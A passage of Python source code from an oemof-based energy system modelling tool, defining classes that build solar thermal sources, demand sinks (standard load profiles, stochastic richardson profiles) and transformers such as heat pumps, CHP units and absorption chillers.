:type so: dict\n :param so: has to contain the following keyword arguments\n\n - 'input'\n - 'technology':\n - 'solar_thermal_flat_plate' or\n - 'concentrated_solar_power'\n - 'Latitude'\n - 'Longitude'\n - 'Surface Tilt'\n - 'Azimuth'\n - 'Cleanliness'\n - 'ETA 0'\n - 'A1'\n - 'A2'\n - 'C1'\n - 'C2'\n - 'Temperature Inlet'\n - 'Temperature Difference'\n - 'Conversion Factor'\n - 'Peripheral Losses'\n - 'Electric Consumption'\n @ Yannick Wittor - yw090223@fh-muenster.de, 27.11.2020\n \"\"\"\n\n # import oemof.thermal in order to calculate collector heat output\n from oemof.thermal.solar_thermal_collector import flat_plate_precalc\n from oemof.thermal.concentrating_solar_power import csp_precalc\n import numpy\n\n # creates an oemof-bus object for solar thermal collector\n col_bus = solph.Bus(label=so['label'] + '_bus')\n # adds the bus object to the list of components \"nodes\"\n self.nodes_sources.append(col_bus)\n self.busd[so['label'] + '_bus'] = col_bus\n output = col_bus\n\n # import weather data and set datetime index with hourly frequency\n data.index.name = 'Datum'\n # TODO get frequency from energysystem sheet\n data = data.asfreq('h')\n\n # calculates global horizontal irradiance from diffuse (dhi)\n # and direct irradiance (dirhi) and adds it to the weather data frame\n data['ghi'] = (data[\"dirhi\"] + data[\"dhi\"])\n\n # precalculations for flat plate collectors, calculates total\n # irradiance on collector, efficiency and heat output\n if so['technology'] == 'solar_thermal_flat_plate':\n precalc_results = flat_plate_precalc(\n lat=so['Latitude'],\n long=so['Longitude'],\n collector_tilt=so['Surface Tilt'],\n collector_azimuth=so['Azimuth'],\n eta_0=so['ETA 0'],\n a_1=so['A1'],\n a_2=so['A2'],\n temp_collector_inlet=\n so['Temperature Inlet'],\n delta_temp_n=\n so['Temperature Difference'],\n irradiance_global=(data['ghi']),\n irradiance_diffuse=(data['dhi']),\n temp_amb=data['temperature'])\n # set variables collectors_heat and irradiance and conversion\n # from W/sqm to kW/sqm\n collectors_heat = precalc_results.collectors_heat/1000\n irradiance = precalc_results.col_ira/1000\n\n # set parameters for precalculations for concentrating solar power\n elif so['technology'] == 'concentrated_solar_power':\n # precalculation with parameter set, ambient temperature and\n # direct horizontal irradiance. Calculates total irradiance on\n # collector, efficiency and heat output\n precalc_results = csp_precalc(\n lat=so['Latitude'],\n long=so['Longitude'],\n collector_tilt=so['Surface Tilt'],\n collector_azimuth=so['Azimuth'],\n cleanliness = so['Cleanliness'],\n a_1=so['A1'],\n a_2 = so['A2'],\n eta_0=so['ETA 0'],\n c_1 = so['C1'],\n c_2 = so['C2'],\n temp_collector_inlet = so['Temperature Inlet'],\n temp_collector_outlet = so['Temperature Inlet']\n + so['Temperature Difference'],\n temp_amb=data['temperature'],\n E_dir_hor=data['dirhi'])\n \n # set variables collectors_heat and irradiance and conversion\n # from W/sqm to kW/sqm\n collectors_heat = precalc_results.collector_heat/1000\n irradiance = precalc_results.collector_irradiance/1000\n\n # set collector heat as timeseries as argument for source\n if so['fixed'] == 1:\n # sets the attribute for a fixed solar heat source\n args = {'fix': collectors_heat}\n elif so['fixed'] == 0:\n # sets the attributes for an unfixed solar heat source\n args = {'min': 0, 'max': collectors_heat}\n else:\n raise SystemError(so['label'] + \" Error in fixed attribute\")\n\n # starts the create_source method with the parameters set before\n self.create_source(so, args, output)\n\n self.nodes_sources.append(solph.Transformer(\n label=so['label'] + '_collector',\n inputs={self.busd[so['label'] + '_bus']:\n solph.Flow(variable_costs=0),\n self.busd[so['input']]: solph.Flow(variable_costs=0)},\n outputs={self.busd[so['output']]: solph.Flow(variable_costs=0)},\n conversion_factors={\n self.busd[so['label'] + '_bus']: 1,\n self.busd[so['input']]:\n so['Electric Consumption'] *\n (1 - so['Peripheral Losses']),\n self.busd[so['output']]:\n 1 - so['Peripheral Losses']\n }))\n\n # returns logging info\n logging.info(' ' + 'Source created: ' + so['label']\n + \", Max Heat power output per year and m²: {:2.2f}\".\n format(numpy.sum(collectors_heat)) + ' kWh/(m²a)'\n + \", Irradiance on collector per year and m²: \"\n \"{:2.2f}\".format(numpy.sum(irradiance)) + ' kWh/(m²a)')\n\n def __init__(self, nodes_data: dict, nodes: list, busd: dict,\n time_series, weather_data):\n \"\"\"\n Inits the source class\n ---\n Other variables:\n\n nodes_sources: obj:'list'\n -- class intern list of sources that are already created\n \"\"\"\n # Delete possible residues of a previous run from the class\n # internal list nodes_sources\n self.nodes_sources = []\n # Initialise a class intern copy of the bus dictionary\n self.busd = busd.copy()\n\n # Create Source from \"Sources\" Table\n for i, so in nodes_data['sources'].iterrows():\n # Create a source object for every source,\n # which is marked as \"active\"\n if so['active']:\n # Create Commodity Sources\n if so['technology'] == 'other':\n self.commodity_source(so)\n \n # Create Photovoltaic Sources\n elif so['technology'] == 'photovoltaic':\n self.pv_source(so, weather_data)\n \n # Create Windpower Sources\n elif so['technology'] == 'windpower':\n self.windpower_source(so, weather_data)\n \n # Create Time-series Sources\n elif so['technology'] == 'timeseries':\n self.timeseries_source(so, time_series)\n\n # Create flat plate solar thermal Sources\n elif so['technology'] in ['solar_thermal_flat_plate',\n 'concentrated_solar_power']:\n self.solar_heat_source(so, weather_data)\n \n # appends created sources and other objects to the list of nodes\n for i in range(len(self.nodes_sources)):\n nodes.append(self.nodes_sources[i])\n\n\nclass Sinks:\n \"\"\"\n Creates sink objects.\n \n There are four options for labeling source objects to be\n created:\n\n - unfixed: a source with flexible time series\n - timeseries: a source with predefined time series\n - SLP: a VDEW standard load profile component\n - richardson: a component with stochastically generated timeseries\n\n :param nodes_data: dictionary containing parameters of sinks to\n be created.The following data have to be\n provided:\n\n - 'label'\n - 'active'\n - 'fixed'\n - 'input'\n - 'load profile'\n - 'nominal value'\n - 'annual demand'\n - 'occupants [Richardson]'\n - 'building class'\n - 'wind class'\n :type nodes_data: dict\n :param busd: dictionary containing the buses of the energy system\n :type busd: dict\n :param nodes: list of components created before(can be empty)\n :type nodes: list\n :param filepath: path to .xlsx scenario-file containing a\n \"weather data\" sheet with timeseries for\n\n - \"dhi\"(diffuse horizontal irradiation)\n W / m ^ 2\n - \"dirhi\"(direct horizontal irradiance)\n W / m ^ 2\n - \"pressure\" in Pa\n - \"temperature\" in °C\n - \"windspeed\" in m / s\n - \"z0\"(roughness length) in m\n :type filepath: str\n\n Contributors:\n\n - Christian Klemm - christian.klemm@fh-muenster.de\n - Gregor Becker - gregor.becker@fh-muenster.de\n \"\"\"\n # intern variables\n busd = None\n nodes_sinks = []\n \n def create_sink(self, de: dict, timeseries_args: dict):\n \"\"\"\n Creates an oemof sink with fixed or unfixed timeseries.\n\n :param de: dictionary containing all information for the\n creation of an oemof sink. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'input'\n\n :type de: dict\n :param timeseries_args: dictionary rather containing the\n 'fix-attribute' or the 'min-' and\n 'max-attribute' of a sink\n :type timeseries_args: dict\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # creates an omeof Sink and appends it to the class intern list\n # of created sinks\n self.nodes_sinks.append(\n solph.Sink(label=de['label'],\n inputs={\n self.busd[de['input']]:\n solph.Flow(**timeseries_args)}))\n \n def unfixed_sink(self, de: dict):\n \"\"\"\n Creates a sink object with an unfixed energy input and the\n use of the create_sink method.\n\n :param de: dictionary containing all information for the\n creation of an oemof sink. For this function the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'nominal value'\n :type de: dict\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n \n # set static inflow values\n inflow_args = {'nominal_value': de['nominal value']}\n # starts the create_sink method with the parameters set before\n self.create_sink(de, inflow_args)\n # returns logging info\n logging.info(' ' + 'Sink created: ' + de['label'])\n \n def timeseries_sink(self, de, nodes_data):\n \"\"\"\n Creates a sink object with a fixed input. The input must be\n given as a time series in the scenario file.\n In this context the method uses the create_sink method.\n\n :param de: dictionary containing all information for the\n creation of an oemof sink. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'nominal value'\n :type de: dict\n :param filepath: path to .xlsx scenario-file containing a\n \"time_series\" sheet\n :type filepath: str\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # imports the time_series sheet of the scenario file\n\n # sets the nominal value\n args = {'nominal_value': de['nominal value']}\n if de['fixed'] == 0:\n # sets the attributes for an unfixed time_series sink\n args.update({'min': nodes_data[de['label'] + '.min'].tolist(),\n 'max': nodes_data[de['label'] + '.max'].tolist()})\n elif de['fixed'] == 1:\n # sets the attributes for a fixed time_series sink\n args.update({'fix': nodes_data[de['label'] + '.fix'].tolist()})\n # starts the create_sink method with the parameters set before\n self.create_sink(de, args)\n \n # returns logging info\n logging.info(' ' + 'Sink created: ' + de['label'])\n \n def slp_sink(self, de: dict, nodes_data: dict, weather_data):\n \"\"\"\n Creates a sink with a residential or commercial\n SLP time series.\n \n Creates a sink with inputs according to VDEW standard\n load profiles, using oemofs demandlib.\n Used for the modelling of residential or commercial\n electricity demand.\n In this context the method uses the create_sink method.\n\n :param de: dictionary containing all information for the\n creation of an oemof sink. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'load profile'\n - 'annual demand'\n - 'building class'\n - 'wind class'\n :type de: dict\n :param filepath: path to .xlsx scenario-file containing a\n \"energysystem\" sheet\n :type filepath: str\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n heat_slps = ['efh', 'mfh']\n heat_slps_commercial = \\\n ['gmf', 'gpd', 'ghd', 'gwa', 'ggb', 'gko', 'gbd', 'gba',\n 'gmk', 'gbh', 'gga', 'gha']\n electricity_slps = \\\n ['h0', 'g0', 'g1', 'g2', 'g3', 'g4', 'g5', 'g6', 'l0', 'l1', 'l2']\n # Import weather Data\n # Importing timesystem parameters from the scenario\n ts = next(nodes_data['energysystem'].iterrows())[1]\n temp_resolution = ts['temporal resolution']\n periods = ts[\"periods\"]\n start_date = str(ts['start date'])\n \n # Converting start date into datetime format\n start_date = \\\n datetime.datetime.strptime(start_date, '%Y-%m-%d %H:%M:%S')\n \n # Create DataFrame\n demand = pd.DataFrame(\n index=pd.date_range(pd.datetime(start_date.year,\n start_date.month,\n start_date.day,\n start_date.hour),\n periods=periods, freq=temp_resolution))\n # creates time series\n if de['load profile'] in heat_slps_commercial \\\n or de['load profile'] in heat_slps:\n # sets the parameters of the heat slps\n args = {'temperature': weather_data['temperature'],\n 'shlp_type': de['load profile'],\n 'wind_class': de['wind class'],\n 'annual_heat_demand': 1,\n 'name': de['load profile']}\n if de['load profile'] in heat_slps:\n # adds the building class which is only necessary for\n # the non commercial slps\n args.update(\n {'building_class': de['building class']})\n demand[de['load profile']] = bdew.HeatBuilding(\n demand.index, **args).get_bdew_profile()\n elif de['load profile'] in electricity_slps:\n year = datetime.datetime.strptime(str(ts['start date']),\n '%Y-%m-%d %H:%M:%S').year\n # Imports standard load profiles\n e_slp = bdew.ElecSlp(year)\n # TODO Discuss if this is right !!! ( dyn_function_h0 )\n demand = e_slp.get_profile({de['load profile']: 1})\n # creates time series based on standard load profiles\n demand = demand.resample(temp_resolution).mean()\n # sets the nominal value\n args = {'nominal_value': de['annual demand']}\n if de['fixed'] == 1:\n # sets the parameters for a fixed sink\n args.update({'fix': demand[de['load profile']]})\n elif de['fixed'] == 0:\n # sets the parameters for an unfixed sink\n args.update({'max': demand[de['load profile']]})\n # starts the create_sink method with the parameters set before\n self.create_sink(de, args)\n # returns logging info\n logging.info(' ' + 'Sink created: ' + de['label'])\n \n def richardson_sink(self, de: dict, nodes_data: dict, weather_data):\n \"\"\"\n Creates a sink with stochastically timeseries.\n \n Creates a sink with stochastically generated input, using\n richardson.py. Used for the modelling of residential\n electricity demands. In this context the method uses the\n create_sink method.\n\n :param de: dictionary containing all information for\n the creation of an oemof sink. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'fixed'\n - 'annual demand'\n - 'occupants'\n :type de: dict\n :param nodes_data: dictionary containing excel sheets\n :type nodes_data: dict\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n \n import richardsonpy.classes.occupancy as occ\n import richardsonpy.classes.electric_load as eload\n # Import Weather Data\n dirhi = weather_data[\"dirhi\"].values.flatten()\n dhi = weather_data[\"dhi\"].values.flatten()\n \n # Conversion of irradiation from W/m^2 to kW/m^2\n dhi = dhi / 1000\n dirhi = dirhi / 1000\n \n # Reads the temporal resolution from the scenario file\n ts = nodes_data['energysystem']\n temp_resolution = ts['temporal resolution'][1]\n \n # sets the occupancy rates\n nb_occ = de['occupants']\n \n # Workaround, because richardson.py only allows a maximum\n # of 5 occupants\n if nb_occ > 5:\n nb_occ = 5\n \n # sets the temporal resolution of the richardson.py time series,\n # depending on the temporal resolution of the entire model (as\n # defined in the input spreadsheet)\n if temp_resolution == 'H':\n timestep = 3600 # in seconds\n elif temp_resolution == 'h':\n timestep = 3600 # in seconds\n elif temp_resolution == 'min':\n timestep = 60 # in seconds\n elif temp_resolution == 's':\n timestep = 1 # in seconds\n else:\n raise SystemError('Invalid Temporal Resolution')\n \n # Generate occupancy object\n # (necessary as input for electric load gen)\n occ_obj = occ.Occupancy(number_occupants=nb_occ)\n \n # Generate stochastic electric power object\n el_load_obj = eload.ElectricLoad(occ_profile=occ_obj.occupancy,\n total_nb_occ=nb_occ, q_direct=dirhi,\n q_diffuse=dhi, timestep=timestep)\n \n # creates richardson.py time series\n load_profile = el_load_obj.loadcurve\n richardson_demand = (sum(el_load_obj.loadcurve)\n * timestep / (3600 * 1000))\n annual_demand = de['annual demand']\n \n # Disables the stochastic simulation of the total yearly demand\n # by scaling the generated time series using the total energy\n # demand of the sink generated in the spreadsheet\n demand_ratio = annual_demand / richardson_demand\n # sets nominal value\n args = {'nominal_value': 0.001 * demand_ratio}\n if de['fixed'] == 1:\n # sets attributes for a fixed richardson sink\n args.update({'fix': load_profile})\n elif de['fixed'] == 0:\n # sets attributes for an unfixed richardson sink\n args.update({'max': load_profile})\n # starts the create_sink method with the parameters set before\n self.create_sink(de, args)\n # returns logging info\n logging.info(' ' + 'Sink created: ' + de['label'])\n \n def __init__(self, nodes_data: dict, busd: dict, nodes: list, time_series,\n weather_data):\n \"\"\" Inits the sink class.\n ---\n Other variables:\n \n nodes_sinks: obj:'list'\n -- class intern list of sinks that are already created\n\n \"\"\"\n \n # Delete possible residues of a previous run from the class\n # internal list nodes_sinks\n self.nodes_sinks = []\n # Initialise a class intern copy of the bus dictionary\n self.busd = busd.copy()\n \n # Create sink objects\n for i, de in nodes_data['sinks'].iterrows():\n slps = \\\n ['efh', 'mfh', 'gmf', 'gpd', 'ghd', 'gwa', 'ggb', 'gko', 'gbd',\n 'gba', 'gmk', 'gbh', 'gga', 'gha', 'h0', 'g0', 'g1', 'g2',\n 'g3', 'g4', 'g5', 'g6', 'l0', 'l1', 'l2']\n \n if de['active']:\n \n # Create Sinks un-fixed time-series\n if de['load profile'] == 'x':\n self.unfixed_sink(de)\n \n # Create Sinks with Time-series\n elif de['load profile'] == 'timeseries':\n self.timeseries_sink(de, time_series)\n \n # Create Sinks with SLP's\n elif de['load profile'] in slps:\n self.slp_sink(de, nodes_data, weather_data)\n \n # Richardson\n elif de['load profile'] == 'richardson':\n self.richardson_sink(de, nodes_data, weather_data)\n \n # appends created sinks on the list of nodes\n for i in range(len(self.nodes_sinks)):\n nodes.append(self.nodes_sinks[i])\n\n\nclass Transformers:\n \"\"\"\n Creates a transformer object.\n Creates transformers objects as defined in 'nodes_data' and adds\n them to the list of components 'nodes'.\n\n :param nodes_data: dictionary containing data from excel scenario\n file. The following data have to be provided:\n\n - label,\n - active,\n - transformer type,\n - input,\n - output,\n - output2,\n - efficiency,\n - efficiency2,\n - variable input costs,\n - variable output costs,\n - existing capacity,\n - max. investment capacity,\n - min. investment capacity,\n - periodical costs\n :type nodes_data: dict\n :param busd: dictionary containing the buses of the energy system\n :type busd: dict\n :param nodes: list of components created before(can be empty)\n :type nodes: list\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # intern variables\n nodes_transformer = []\n busd = None\n \n def create_transformer(self, tf, inputs, outputs, conversion_factors):\n \"\"\" TODO Docstring missing \"\"\"\n self.nodes_transformer.append(solph.Transformer(\n label=tf['label'], **inputs, **outputs, **conversion_factors))\n logging.info(' ' + 'Transformer created: ' + tf['label'])\n \n def generic_transformer(self, tf: dict):\n \"\"\"\n Creates a Generic Transformer object.\n Creates a generic transformer with the parameters given in\n 'nodes_data' and adds it to the list of components 'nodes'.\n\n :param tf: dictionary containing all information for the\n creation of an oemof transformer. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'input'\n - 'output'\n - 'output2'\n - 'efficiency'\n - 'efficiency2'\n - 'variable input costs / (CU/kWh)'\n - 'variable output costs / (CU/kWh)'\n - 'variable output costs 2 / (CU/kWh)'\n - 'periodical costs / (CU/kWh)'\n - 'min. investment capacity / (kW)'\n - 'max. investment capacity / (kW)'\n - 'existing capacity / (kW)'\n - 'non-convex investment'\n - 'fix investment costs / (CU/a)'\n :type tf: dict\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n outputs = \\\n {self.busd[tf['output']]: solph.Flow(\n variable_costs=tf['variable output costs'],\n emission_factor=tf[\n 'variable output constraint costs'],\n investment=solph.Investment(\n ep_costs=tf['periodical costs'],\n periodical_constraint_costs=tf[\n 'periodical constraint costs'],\n minimum=tf['min. investment capacity'],\n maximum=tf['max. investment capacity'],\n existing=tf['existing capacity'],\n nonconvex=True if\n tf['non-convex investment'] == 1 else False,\n offset=tf['fix investment costs']))}\n conversion_factors = {self.busd[tf['output']]: tf['efficiency']}\n # Defines Capacity values for the second transformer output\n if tf['output2'] not in ['None', 'none', 0]:\n existing_capacity2 = \\\n ((float(tf['efficiency2']) / float(tf['efficiency']))\n * float(tf['existing capacity']))\n minimum_capacity2 = ((float(tf['efficiency2'])\n / float(tf['efficiency']))\n * float(tf['min. investment capacity']))\n maximum_capacity2 = ((float(tf['efficiency2'])\n / float(tf['efficiency']))\n * float(tf['max. investment capacity']))\n # Creates transformer object and adds it to the list of\n # components\n outputs.update(\n {self.busd[tf['output2']]: solph.Flow(\n variable_costs=tf['variable output costs 2'],\n emission_factor=tf[\n 'variable output constraint costs 2'],\n investment=solph.Investment(\n ep_costs=0,\n existing=existing_capacity2,\n minimum=minimum_capacity2,\n maximum=maximum_capacity2,\n nonconvex=True if\n tf['non-convex investment'] == 1 else False,\n offset=tf['fix investment costs']))})\n conversion_factors.update(\n {self.busd[tf['output2']]: tf['efficiency2']})\n outputs = {\"outputs\": outputs}\n \n conversion_factors = {\"conversion_factors\": conversion_factors}\n inputs = {\"inputs\": {self.busd[tf['input']]: solph.Flow(\n variable_costs=tf['variable input costs'],\n emission_factor=tf['variable input constraint costs'])\n }}\n self.create_transformer(tf, inputs, outputs, conversion_factors)\n\n def compression_heat_transformer(self, tf: dict, data):\n \"\"\"\n Creates a Compression Heat Pump or Compression Chiller by using\n oemof.thermal and adds it to the list of components 'nodes'.\n Parameters are given in 'nodes_data' are used .\n \n :param tf: has to contain the following keyword arguments\n \n - 'label'\n - 'variable input costs / (CU/kWh)'\n - 'variable output costs / (CU/kWh)'\n - 'min. investment capacity / (kW)'\n - 'max. investment capacity / (kW)'\n - 'existing capacity / (kW)'\n - 'transformer type': 'compression_heat_transformer'\n - 'mode':\n - 'heat_pump' or\n - 'chiller'\n - 'heat source'\n - 'temperature high'\n - 'temperature low'\n - 'quality grade'\n - 'area'\n - 'length of the geoth. probe'\n - 'heat extraction'\n - 'min. borehole area'\n - 'temp. threshold icing'\n - 'factor icing'\n :type tf: dict\n :param data: Dataframe containing all temperature information \\\n for the low temperature source. At least the \\\n following key-value-pairs have to be included:\n\n - 'ground_temp'\n - 'groundwater_temp'\n - 'temperature'\n - 'water_temp'\n :type data: pandas.core.frame.Dataframe\n\n :raise SystemError: choosen heat source not defined\n\n Janik Budde - Janik.Budde@fh-muenster.de\n Yannick Wittor - yw090223@fh-muenster.de\n \"\"\"\n \n # import oemof.thermal in order to calculate the cop\n import oemof.thermal.compression_heatpumps_and_chillers \\\n as cmpr_hp_chiller\n import math\n\n # creates one oemof-bus object for compression heat transformers\n # depending on mode of operation\n if tf['mode'] == 'heat_pump':\n temp = '_low_temp'\n elif tf['mode'] == 'chiller':\n temp = '_high_temp'\n else:\n raise ValueError(\"Mode of \" + tf['label']\n + \"contains a typo\")\n bus = solph.Bus(label=tf['label'] + temp + '_bus')\n \n # adds the bus object to the list of components \"nodes\"\n self.nodes_transformer.append(bus)\n self.busd[tf['label'] + temp + '_bus'] = bus\n \n # returns logging info\n logging.info(' ' + 'Bus created: ' + tf['label'] + temp + '_bus')\n \n # differentiation between heat sources under consideration of mode\n # of operation\n # ground as a heat source referring to vertical-borehole\n # ground-coupled compression heat transformers\n if tf['heat source'] == \"Ground\":\n \n # borehole that acts as heat source for the transformer\n cmpr_heat_transformer_label = tf['label'] + \\\n temp + '_ground_source'\n \n # the capacity of a borehole is limited by the area\n heatsource_capacity = \\\n tf['area'] * \\\n (tf['length of the geoth. probe']\n * tf['heat extraction']\n / tf['min. borehole area'])\n # ground water as a heat source\n elif tf['heat source'] == \"GroundWater\":\n \n # ground water that acts as heat source for the transformer\n cmpr_heat_transformer_label = tf['label'] + \\\n temp + '_groundwater_source'\n \n # the capacity of ambient ground water is not limited\n heatsource_capacity = math.inf\n \n # ambient air as a heat source\n elif tf['heat source'] == \"Air\":\n \n # ambient air that acts as heat source for the transformer\n cmpr_heat_transformer_label = tf['label'] + temp + '_air_source'\n \n # the capacity of ambient air is not limited\n heatsource_capacity = math.inf\n \n # surface water as a heat source\n elif tf['heat source'] == \"Water\":\n \n # ambient air that acts as heat source for the transformer\n cmpr_heat_transformer_label = tf['label'] + temp + '_water_source'\n \n # the capacity of ambient water is not limited\n heatsource_capacity = math.inf\n else:\n raise ValueError(tf['label'] + \" Error in heat source attribute\")\n maximum = heatsource_capacity\n # Creates heat source for transformer. The heat source costs are\n # considered by the transformer.\n self.nodes_transformer.append(\n solph.Source(label=cmpr_heat_transformer_label,\n outputs={self.busd[\n tf['label'] + temp + '_bus']: solph.Flow(\n investment=solph.Investment(ep_costs=0,\n minimum=0,\n maximum=maximum,\n existing=0),\n variable_costs=0)}))\n \n # Returns logging info\n logging.info(\n ' ' + 'Heat Source created: ' + tf['label']\n + temp + '_source')\n \n # set temp_high and temp_low and icing considering different\n # heat sources and the mode of operation\n if tf['heat source'] == \"Ground\":\n if tf['mode'] == 'heat_pump':\n temp_low = data['ground_temp']\n elif tf['mode'] == 'chiller':\n temp_high = data['ground_temp']\n elif tf['heat source'] == \"GroundWater\":\n if tf['mode'] == 'heat_pump':\n temp_low = data['groundwater_temp']\n elif tf['mode'] == 'chiller':\n temp_high = data['groundwater_temp']\n elif tf['heat source'] == \"Air\":\n if tf['mode'] == 'heat_pump':\n temp_low = data['temperature']\n elif tf['mode'] == 'chiller':\n temp_high = data['temperature'].copy()\n temp_low_value = tf['temperature low']\n # low temperature as formula to avoid division by zero error\n for index, value in enumerate(temp_high):\n if value == temp_low_value:\n temp_high[index] = temp_low_value + 0.1\n elif tf['heat source'] == \"Water\":\n if tf['mode'] == 'heat_pump':\n temp_low = data['water_temp']\n elif tf['mode'] == 'chiller':\n temp_high = data['water_temp']\n else:\n raise SystemError(tf['label'] + \" Error in heat source attribute\")\n \n if tf['mode'] == 'heat_pump':\n temp_threshold_icing = tf['temp. threshold icing']\n factor_icing = tf['factor icing']\n temp_high = [tf['temperature high']]\n elif tf['mode'] == 'chiller':\n # variable \"icing\" is not important in cooling mode\n temp_threshold_icing = None\n factor_icing = None\n temp_low = [tf['temperature low']]\n else:\n raise ValueError(\"Mode of \" + tf['label']\n + \"contains a typo\")\n # calculation of COPs with set parameters\n cops_hp = cmpr_hp_chiller.calc_cops(\n temp_high=temp_high,\n temp_low=temp_low,\n quality_grade=tf['quality grade'],\n temp_threshold_icing=temp_threshold_icing,\n factor_icing=factor_icing,\n mode=tf['mode'])\n logging.info(' ' + tf['label']\n + \", Average Coefficient of Performance (COP): {:2.2f}\"\n .format(numpy.mean(cops_hp)))\n\n # Creates transformer object and adds it to the list of components\n inputs = {\"inputs\": {self.busd[tf['input']]: solph.Flow(\n variable_costs=tf['variable input costs'],\n emission_factor=\n tf['variable input constraint costs']),\n self.busd[tf['label'] + temp + '_bus']: solph.Flow(\n variable_costs=0)}}\n outputs = {\"outputs\": {self.busd[tf['output']]: solph.Flow(\n variable_costs=tf['variable output costs'],\n emission_factor=tf[\n 'variable output constraint costs'],\n investment=solph.Investment(\n ep_costs=tf['periodical costs'],\n minimum=tf['min. investment capacity'],\n maximum=tf['max. investment capacity'],\n periodical_constraint_costs=tf[\n 'periodical constraint costs'],\n existing=tf['existing capacity']))}}\n conversion_factors = {\n \"conversion_factors\": {\n self.busd[tf['label'] + temp + '_bus']:\n [((cop - 1) / cop)/tf['efficiency']\n for cop in cops_hp],\n self.busd[tf['input']]: [1 / cop for cop in cops_hp]}}\n self.create_transformer(tf, inputs, outputs, conversion_factors)\n \n def genericchp_transformer(self, tf: dict, nd: dict):\n \"\"\"\n Creates a Generic CHP transformer object.\n Creates a generic chp transformer with the parameters given\n in 'nodes_data' and adds it to the list of components\n 'nodes'.\n\n :param tf: dictionary containing all information for the\n creation of an oemof transformer. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'input'\n - 'output'\n - 'output2'\n - 'efficiency'\n - 'efficiency2'\n - 'variable input costs / (CU/kWh)'\n - 'variable output costs / (CU/kWh)'\n - 'variable output costs 2 / (CU/kWh)'\n - 'periodical costs / (CU/kWh)'\n - 'min. investment capacity / (kW)'\n - 'max. investment capacity / (kW)'\n - 'existing capacity / (kW)'\n - 'non-convex investment'\n - 'fix investment costs / (CU/a)'\n :type tf: dict\n :param nd: dictionary containing parameters of the buses\n to be created.\n :type nd: dict\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # counts the number of periods within the given datetime index\n # and saves it as variable\n # (number of periods is required for creating generic chp transformers)\n # Importing timesystem parameters from the scenario\n ts = next(nd['energysystem'].iterrows())[1]\n periods = int(ts['periods'])\n # creates genericCHP transformer object and adds it to the\n # list of components\n self.nodes_transformer.append(solph.components.GenericCHP(\n label=tf['label'],\n fuel_input={\n self.busd[tf['input']]: solph.Flow(\n H_L_FG_share_max=[\n tf['share of flue gas loss at max heat '\n 'extraction']\n for p in range(0, periods)],\n H_L_FG_share_min=[\n tf['share of flue gas loss at min heat '\n 'extraction']\n for p in range(0, periods)],\n variable_costs=tf[\n 'variable input costs'],\n emission_factor=\n tf['variable input constraint costs'])},\n electrical_output={\n self.busd[tf['output']]: solph.Flow(\n investment=solph.Investment(\n ep_costs=tf[\n 'periodical costs'],\n periodical_constraint_costs=tf[\n 'periodical constraint costs'],\n minimum=tf[\n 'min. investment capacity'],\n maximum=tf[\n 'max. investment capacity'],\n existing=tf['existing capacity'],\n nonconvex=True if\n tf['non-convex investment'] == 1 else False,\n offset=tf['fix investment costs']\n ),\n P_max_woDH=[\n tf['max. electric power without district '\n 'heating']\n for p in range(0, periods)],\n P_min_woDH=[tf['min. electric power without '\n 'district heating']\n for p in range(0, periods)],\n Eta_el_max_woDH=[\n tf['el. eff. at max. fuel flow w/o distr. '\n 'heating']\n for p in range(0, periods)],\n Eta_el_min_woDH=[\n tf['el. eff. at min. fuel flow w/o distr. '\n 'heating']\n for p in range(0, periods)],\n variable_costs=tf[\n 'variable output costs'],\n emission_factor=tf[\n 'variable output constraint costs']\n )\n },\n heat_output={self.busd[tf['output2']]: solph.Flow(\n Q_CW_min=[tf['minimal therm. condenser load to '\n 'cooling water']\n for p in range(0, periods)],\n variable_costs=tf[\n 'variable output costs 2'],\n emission_factor=tf[\n 'variable output constraint costs 2']\n )},\n Beta=[tf['power loss index']\n for p in range(0, periods)],\n # fixed_costs=0,\n back_pressure=True if tf['back pressure'] == 1 else False,\n ))\n\n # returns logging info\n logging.info(' ' + 'Transformer created: ' + tf['label'])\n\n def absorption_heat_transformer(self, tf, data):\n \"\"\"\n Creates an absorption heat transformer object with the parameters\n given in 'nodes_data' and adds it to the list of components 'nodes'\n\n\n :type tf: dict\n :param tf: has to contain the following keyword arguments\n - Standard Input information of transformer class\n - 'transformer type': 'absorption_heat_transformer'\n - 'mode': 'chiller'\n - 'name'\n - name refers to models of absorption heat transformers\n with different equation parameters. See documentation\n for possible inputs.\n - 'high temperature'\n - 'chilling temperature'\n - 'electrical input conversion factor'\n - 'recooling temperature difference'\n :param data: weather data\n :type data: dict\n\n Yannick Wittor - yw090223@fh-muenster.de\n \"\"\"\n # import oemof.thermal in order to calculate COP\n import oemof.thermal.absorption_heatpumps_and_chillers \\\n as abs_hp_chiller\n from math import inf\n import numpy as np\n\n # Import characteristic equation parameters\n char_para = pd.read_csv(os.path.join(\n os.path.dirname(__file__)) +\n '/technical_data/characteristic_parameters.csv')\n\n # creates one oemof-bus object for compression heat transformers\n # depending on mode of operation\n if tf['mode'] == 'heat_pump':\n temp = '_low_temp'\n elif tf['mode'] == 'chiller':\n temp = '_high_temp'\n else:\n raise ValueError(\"Mode of \" + tf['label']\n + \"contains a typo\")\n\n bus_label = tf['label'] + temp + '_bus'\n source_label = tf['label'] + temp + '_source'\n bus = solph.Bus(label=bus_label)\n\n # adds the bus object to the list of components \"nodes\"\n self.nodes_transformer.append(bus)\n self.busd[bus_label] = bus\n\n # returns logging info\n logging.info(' ' + 'Bus created: ' + bus_label)\n\n # Calculates cooling temperature in absorber/evaporator depending on\n # ambient air temperature of recooling system\n data_np = np.array(data['temperature'])\n t_cool = data_np + \\\n tf['recooling temperature difference']\n t_cool = list(map(int, t_cool))\n n = len(t_cool)\n\n # Calculation of characteristic temperature difference\n chiller_name = tf['name']\n ddt = 